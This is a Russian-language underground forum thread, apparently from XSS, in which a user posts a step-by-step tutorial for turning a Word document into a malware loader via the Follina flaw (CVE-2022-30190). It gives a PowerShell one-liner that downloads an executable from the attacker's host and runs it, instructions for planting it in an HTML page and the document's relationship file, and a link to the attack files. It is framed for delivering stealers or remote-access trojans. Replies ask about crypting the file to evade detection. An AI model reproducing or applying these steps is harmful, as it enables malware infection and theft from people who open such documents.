• XSS.stack #1 – первый литературный журнал от юзеров форума

Loader exe file to DOC

gordosnb

floppy-диск
Пользователь
Регистрация
17.07.2022
Сообщения
4
Реакции
13
Недавно наткнулся на уязвимость CVE-2022-30190 и решил сделать лоадер (строго не судите) из doc . При запуски doc будет подгружаться exe. На просторах интернета похожего не нашёл. Получилось так себе, но пользоваться можно
:smile:
.

Файлы которые нам понадобиться https://anonfiles.com/96W1efz1y3/WORD_LOADER_rar

Заходим на хостинг , я беру бесплатный free.sprinthost.ru (не реклама).

Переходим в Файловый менеджер
[IMG]


Загружаем 1.html (как его изменить расписано снизу) и ваш [tooltip=9]стиллер[/tooltip] или [tooltip=103]ратник[/tooltip]
[IMG]

Переходим на сайт base64encode.org и вводим
Код:
Get-Process -Name msdt|Stop-Process;powershell -nop -c New-Item -Path "C:\" -Name "temp" -ItemType Directory
(New-Object System.Net.WebClient).DownloadFile("http://hosting/file.exe","C:\temp\file.exe")
Start-Process ("C:\temp\file.exe")
Вместо hosting нужно ввести ваш домен который мы создали выше , а вместо file.exe название вашего exe которого мы загрузили на хостинг .
Потом всё это перекидываем на сайт , после нажимаем на encode и копируем что получилось
[IMG]


Разархивируем файлы которые скачали , открываем 1.html через текстовый редактор листаем в самый вниз и находим "LOLZTEAMMMMMMMM"
[IMG]

Вместо "LOLZTEAMMMMMMMM" вставляем что выдал base64encode.org , после сохраняем файл

После того как наш хостинг и файл готов, открываем follina.doc через 7-ZIP и переходим в follina.doc\word\_rels\ и находим файл document.xml.rels ,нажимаем правой кнопкой, редактировать.
[IMG]

Вместо "ССЫЛКА НА САЙТ" вводим ссылку на хостинг и 1.html , должно получиться так http://hosting/1.html
[IMG]

Сохраняем , и получаем документ который при открытие будет подгружать ваш файл с хостинга и запускать его .

Если выходит данная картина , то всё работает корректно

[IMG]
 
Пожалуйста, обратите внимание, что пользователь заблокирован
nice mate
 
Пожалуйста, обратите внимание, что пользователь заблокирован
спасибо, по больше бы таких )
Так оно же мертвое
об этом писали еще когда оно работало, даже автоматизированную версию выставляли
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Отпишите кто сможет криптануть .doc
unless the codes is refud or obfuscate it
 
[IMG]


[/SPOILER]
Такое чувство что для РУ они выключили проверку )))))

Вот так выглядит когда запустил на офис 2019 Build 14026.20302
photo_2022-07-20_18-00-33.jpg
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх